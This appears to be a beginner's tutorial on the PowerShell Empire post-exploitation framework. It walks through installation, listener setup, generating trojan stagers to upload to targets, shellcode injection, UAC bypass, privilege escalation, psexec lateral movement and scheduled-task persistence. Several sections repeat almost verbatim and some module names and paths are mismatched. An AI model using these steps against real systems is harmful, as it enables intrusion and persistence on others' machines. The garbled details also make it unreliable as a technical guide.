PowerShell Empire for Beginners: A Comprehensive Guide
Foreword
PowerShell Empire, also known as “Empire,” is a powerful penetration tool for Windows platforms. It allows users to achieve network penetration without the need to run PowerShell’s powershell.exe proxy functionality. In this article, we will delve into the world of PowerShell Empire and explore its features, modules, and usage.
Getting Started with PowerShell Empire
PowerShell Empire can be run on Linux platforms, but it is not recommended to use CentOS environments. Before installing, it is essential to review the install.sh script, which contains a lot of remote download packages. It is recommended to use Debian or Ubuntu systems, such as Kali Linux. To install PowerShell Empire, use the following command:
git clone https://github.com/EmpireProject/Empire.git
Enter the Empire directory and run the ./install.sh script. This script will install the necessary packages and take some time to complete. Once the installation is finished, you will be prompted to enter a randomly generated password.
Understanding PowerShell Empire Modules
The latest version of PowerShell Empire contains over 280 modules, including use modules, code execution modules, information collection modules, password credential acquiring modules, and more. Before using PowerShell Empire, it is essential to understand the different modules and their purposes.
Setting Up a Monitor
To set up a monitor, enter the listeners command and press the Tab key to see the available modes. Choose the http mode and set the Name and Host parameters using the set command. For example:
(Empire: listeners)> uselistener http
(Empire: listeners / http)> set Name xiaobai
(Empire: listeners / http)> set Host ip
Generating a Trojan Horse
To generate a Trojan horse, enter the stager command and choose the desired module. For example:
(Empire: stager)> launcher + xiaobai
This will generate a specific file format, such as a .dll or .bat file, which can be uploaded to the target system.
Using PowerShell Empire with Meterpreter
PowerShell Empire can be used in conjunction with Meterpreter, a popular penetration testing framework. To set up a monitoring module, enter the listeners command and choose the http mode. Then, use the launcher command to generate a Trojan horse and upload it to the target system.
Using PowerShell Empire with Cobalt Strike
PowerShell Empire can also be used with Cobalt Strike, another popular penetration testing framework. To set up a monitoring module, enter the listeners command and choose the http mode. Then, use the launcher command to generate a Trojan horse and upload it to the target system.
Using PowerShell Empire Modules
PowerShell Empire contains a wide range of modules, including use modules, code execution modules, information collection modules, password credential acquiring modules, and more. To use a module, enter the usemodule command and choose the desired module. For example:
(Empire: 9x7N513)> usemodule code_execution
This will list the available code execution modules.
Setting Up a Session
To set up a session, enter the interact command and choose the desired session. For example:
(Empire: agents)> interact xiaobai
This will establish a connection to the target system.
Using PowerShell Empire with Meterpreter
To use PowerShell Empire with Meterpreter, enter the usemodule command and choose the code_execution module. Then, use the invoke_shellcode command to inject shell code into the target system.
Using PowerShell Empire with Cobalt Strike
To use PowerShell Empire with Cobalt Strike, enter the usemodule command and choose the code_execution module. Then, use the invoke_shellcode command to inject shell code into the target system.
Gathering Information
PowerShell Empire contains a range of modules for gathering information, including password credential acquiring modules, information collection modules, and more. To use a module, enter the usemodule command and choose the desired module. For example:
(Empire: 97KXRTD5)> usemodule privesc / ms16-032
This will list the available privilege escalation modules.
Privesc Module
The privesc module is used for privilege escalation. To use this module, enter the usemodule command and choose the ms16-032 module. Then, use the execute command to execute the module.
Allchecks Module
The allchecks module is used for privilege escalation. To use this module, enter the usemodule command and choose the powerup / allchecks module. Then, use the execute command to execute the module.
Bypass UAC Module
The bypassuac module is used for privilege escalation. To use this module, enter the usemodule command and choose the privesc / bypassuac module. Then, use the execute command to execute the module.
Arpscan Module
The arpscans module is used for network scanning. To use this module, enter the usemodule command and choose the situational_awareness / network / arpscans module. Then, use the execute command to execute the module.
Psinject Module
The psinject module is used for process injection. To use this module, enter the usemodule command and choose the management / psinject module. Then, use the execute command to execute the module.
Psexec Module
The psexec module is used for lateral movement. To use this module, enter the usemodule command and choose the lateral_movement / invoke_psexec module. Then, use the execute command to execute the module.
Registry Module
The registry module is used for registry manipulation. To use this module, enter the usemodule command and choose the persistence / elevated / schtasks module. Then, use the execute command to execute the module.
Schtasks Module
The schtasks module is used for Task Scheduler manipulation. To use this module, enter the usemodule command and choose the persistence / elevated / schtasks module. Then, use the execute command to execute the module.
Conclusion
PowerShell Empire is a powerful penetration tool for Windows platforms. It allows users to achieve network penetration without the need to run PowerShell’s powershell.exe proxy functionality. In this article, we have explored the features, modules, and usage of PowerShell Empire. We have also covered the use of PowerShell Empire with Meterpreter and Cobalt Strike. With its wide range of modules and flexible usage, PowerShell Empire is an essential tool for any penetration tester or security researcher.